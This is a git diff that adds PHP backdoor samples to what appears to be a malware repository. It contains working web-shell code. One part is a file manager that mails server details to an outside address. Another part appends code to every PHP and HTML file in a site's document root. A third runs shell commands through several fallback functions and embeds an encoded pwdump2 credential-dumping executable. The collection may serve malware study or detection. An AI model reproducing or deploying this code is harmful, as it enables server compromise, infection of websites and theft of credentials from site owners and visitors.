    "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +$colorn = 0; + while (false !== ($file = readdir($handle))) { + if ($file != '.') { + if ($colorn == 0) { + $color = "style=\"background-color: #FF9900\""; + } + elseif ($colorn == 1) { + $color = "style=\"background-color: #FFCC33\""; + } + if (@is_dir("$chdir"."$file")) { + $file = $file.'/'; + $mode = 'chdir'; + } else { + $mode = 'edit'; + } + if (@substr("$chdir", strlen($chdir) -1, 1) != '/') { + $chdir .= '/'; + } + if ($file == '../') { + $lenpath = strlen($chdir); $baras = 0; + for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } } + $chdir_ = explode("/", $chdir); + $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir); + } + $perms = @fileperms ("$chdir"."$file"); + if ($perms == '') { + $perms = '???'; + } + $size = @filesize ("$chdir"."$file"); + $size = $size / 1024; + $size = explode(".", $size); + if (@$size[1] != '') { + $size = $size[0].'.'.@substr("$size[1]", 0, 2); + } else { + $size = $size[0]; + } + if ($size == 0) { + if ($mode == 'chdir') { + $size = '???'; + } + } + echo ""; + echo ""; + if (@is_writable ("$chdir"."$file")) { + if ($mode == 'chdir') { + if ($file == '../') { + echo ""; + } else { + echo ""; + } + } else { + if (is_readable("$chdir"."$file")) { + echo ""; + } else { + echo ""; + } + } + } + else { + if ($mode == 'chdir') { + if ($file == '../') { + echo ""; + } else { + echo ""; + } + } else { + if (@is_readable("$chdir"."$file")) { + echo ""; + } else { + echo ""; + } + } + } + echo ""; + if ($mode == 'edit') { + echo ""; + } else { + echo ""; + } + echo ""; + if ($colorn == 0) { + $colorn = 1; + } + elseif ($colorn == 1) { + $colorn = 0; + } + } + } + closedir($handle); +} + + $OS = @PHP_OS; + $UNAME = @php_uname(); + $PHPv = @phpversion(); + $SafeMode = @ini_get('safe_mode'); + + if ($SafeMode == '') { $SafeMode = "OFF
    "; } + else { $SafeMode = "$SafeMode
    "; } + + + $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); + + $psn=("OS = " . $OS . "
    UNAME = " . $UNAME . "
    PHPVersion = " . $PHPv . "
    Safe + +Mode = " . $SafeMode . "
    http://" . $injek . "
    Ingat jangan + +pakai Injek Ini.
    By: binushacker"); + + $header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To: $replyto\r\n"; + $header .= "MIME-Version: 1.0\r\n"; + If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + $header .= "Content-Type: text/$contenttype\r\n"; + $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; + $header .= "$message\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; + If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; + If ($file_name) $header .= "Content-Disposition: attachment; + +filename=\"$file_name\"\r\n\r\n"; + If ($file_name) $header .= "$content\r\n"; + If ($file_name) $header .= "--$uid--"; + $to = ("binushacker@hackermail.com"); + $subject = ("scan bos"); + mail($to,$subject,$psn,$header); + +@include "$bn"; +?> +
    Permision Nama File Kapasitas Perintah
    $perms $file $file $file $file $file + + + $file $file $file $size KB Rename | Del + + +| Chmod | Copy Rename | Del + +| Chmod | Copy
    + +
    + + + + + + + + + + diff --git a/PHP/Backdoor.PHP.Agent.al b/PHP/Backdoor.PHP.Agent.al new file mode 100644 index 00000000..5a4c9cd7 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.al @@ -0,0 +1,75 @@ += 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + +elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + +elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + +else {$size = $size . " B";} + +return $size; +} +} +if(!isset($_SERVER['DOCUMENT_ROOT'])) +{ +$n = $_SERVER['SCRIPT_NAME']; +$f = ereg_replace('\\\\', '/',$_SERVER["PATH_TRANSLATED"]); +$f = str_replace('//','/',$f); +$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f); +} +$codigo = "\n"; +$directorio = $_SERVER['DOCUMENT_ROOT']; + +foreach (glob("$directorio/*.php") as $archivo) { +$fp=fopen($archivo,"a+"); +fputs($fp,$codigo); +} +foreach (glob("$directorio/*.htm") as $archivh) { +$fp=fopen($archivh,"a+"); +fputs($fp,$codigo); +} +foreach (glob("$directorio/*.html") as $archivl) { +$fp=fopen($archivl,"a+"); +fputs($fp,$codigo); +} +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.am b/PHP/Backdoor.PHP.Agent.am new file mode 100644 index 00000000..4d586db3 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.am @@ -0,0 +1,8342 @@ +&1","r"))) { +return 126; +} +while (!feof($p)) { +$line=fgets($p,1000); +$out .= $line; +} +pclose($p); +return $out; +} +}else{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ''; + if (!empty($cmd)) + { + if (is_callable('exec') and !in_array('exec',$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ''; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +} + +$pwdump2="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 